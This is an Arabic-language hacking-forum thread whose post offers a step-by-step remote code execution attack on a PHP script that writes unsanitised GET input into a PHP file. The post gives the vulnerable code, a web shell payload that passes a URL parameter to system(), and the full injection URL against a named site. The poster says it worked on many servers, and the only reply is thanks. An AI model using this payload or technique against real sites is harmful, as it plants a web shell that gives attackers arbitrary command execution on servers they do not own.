التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 10-12-2012, 04:28 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Injection
:: Interactive Developer ::
 
الصورة الرمزية Injection
 

 

 
إحصائية العضو





Injection غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Injection is on a distinguished road

افتراضي Full Explain Remote Code Execution


السلام عليكم ورحمه الله وبركاته

السلام والصلاه على سيدنا محمد

سنشرح اليوم ثغره فريدة من نوعهآ ومعروفها وافادتني في سيرفرات كثيرة .

ان شاء الله يكون الشرح سهل جدا ..

الملف المصاب

كود PHP:
<?php
$school 
$_GET['love'];
$ip getenv('REMOTE_ADDR');
$error fopen('vbspiders.php','a');
fwrite($error,'<br />'.$school.'<br />'.$ip.'<br />');
fclose($error);
?>
الثغره تسمح لك بزرع كود خبيث ,

طلبنا الملف عبر المتغير Get

من ثم كونا الملف عبر ملف vbspiders بدالة fopen

ومن ثم قمنا بل تطبيق عبر الدالة fwrite ..

وفي الاخير غلقنا الخطاء بدالة fclose

الملف المصاب هو med.php

كود:
http://forum.advance-hackers.org/xx/med.php?love=


تمام بعد الرابط نزرع الملف ..

عن طريق ,,

كود PHP:
<?php
$cmd
=$_GET['mohamed'];
system($cmd);
?>
تمام نجرب نزرع الملف ..

كود PHP:
http://forum.advance-hackers.org/xx/med.php?love=%3C?php$cmd=$_GET['mohamed'];system($cmd);?%3E 
حلو تم زرع الملف ^_^

كود PHP:
http://forum.advance-hackers.org/xx/mohammed.php 
آتمنة ان افدتكم اخوكم حمد



Full Explain Remote Code Execution

   

رد مع اقتباس
قديم 10-20-2012, 06:57 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية kawihacker
 

 

 
إحصائية العضو






kawihacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kawihacker is on a distinguished road

افتراضي رد: Full Explain Remote Code Execution


يعطيك العافيه ع الشرح

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 04:03 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0